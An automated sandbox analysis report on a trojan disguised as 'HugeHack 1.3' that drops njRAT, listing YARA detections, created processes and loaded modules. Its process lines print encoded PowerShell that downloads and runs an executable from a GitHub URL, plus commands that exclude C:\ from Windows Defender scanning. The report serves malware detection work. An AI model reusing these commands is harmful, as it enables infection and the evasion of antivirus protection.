Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi

Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.phis.bank.troj.adwa.spyw.expl.evad.winEXE@33/24@4/4

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AB0A AdjustTokenPrivileges,	2_2_00E8AB0A
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AAD3 AdjustTokenPrivileges,	2_2_00E8AAD3
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AD86 AdjustTokenPrivileges,	16_2_0098AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AD4F AdjustTokenPrivileges,	16_2_0098AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAD86 AdjustTokenPrivileges,	22_2_013BAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAD4F AdjustTokenPrivileges,	22_2_013BAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAD86 AdjustTokenPrivileges,	23_2_014EAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAD4F AdjustTokenPrivileges,	23_2_014EAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AD86 AdjustTokenPrivileges,	25_2_0060AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AD4F AdjustTokenPrivileges,	25_2_0060AD4F

Source: C:\Users\user\AppData\Local\Temp\Payload.exe

File created: C:\Users\user\AppData\Roaming\dllhost.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\c382eb151c59bd833b24120723eac541
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\ere.js

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HugeHack 1.3.exe.bin.exe	Virustotal: Detection: 76%
Source: HugeHack 1.3.exe.bin.exe	ReversingLabs: Detection: 91%

Source: javaw.exe	String found in binary or memory: *[Ljavafx/scene/paint/Stop;ass
Source: javaw.exe	String found in binary or memory: *[Ljavafx/scene/paint/Stop;ass
Source: javaw.exe	String found in binary or memory: +com/sun/javafx/application/LauncherImpl$$Lambda$54
Source: javaw.exe	String found in binary or memory: (ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: (ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: (Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
Source: javaw.exe	String found in binary or memory: (Ljava/util/List<Ljavafx/scene/paint/Stop;>;)Ljava/lang/Object;
Source: javaw.exe	String found in binary or memory: com/sun/javafx/application/LauncherImpl$$Lambda$49
Source: javaw.exe	String found in binary or memory: -Kcom/sun/javafx/css/parser/StopConverter
Source: javaw.exe	String found in binary or memory: -Kcom/sun/javafx/css/parser/StopConverter
Source: javaw.exe	String found in binary or memory: T(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe	String found in binary or memory: T(DDDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe	String found in binary or memory: -addString
Source: javaw.exe	String found in binary or memory: -AddToSelection
Source: javaw.exe	String found in binary or memory: K/(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V
Source: javaw.exe	String found in binary or memory: K/(DDDDZLjavafx/scene/paint/CycleMethod;Ljava/util/List<Ljavafx/scene/paint/Stop;>;)V

Source: unknown	Process created: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe "C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe"
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
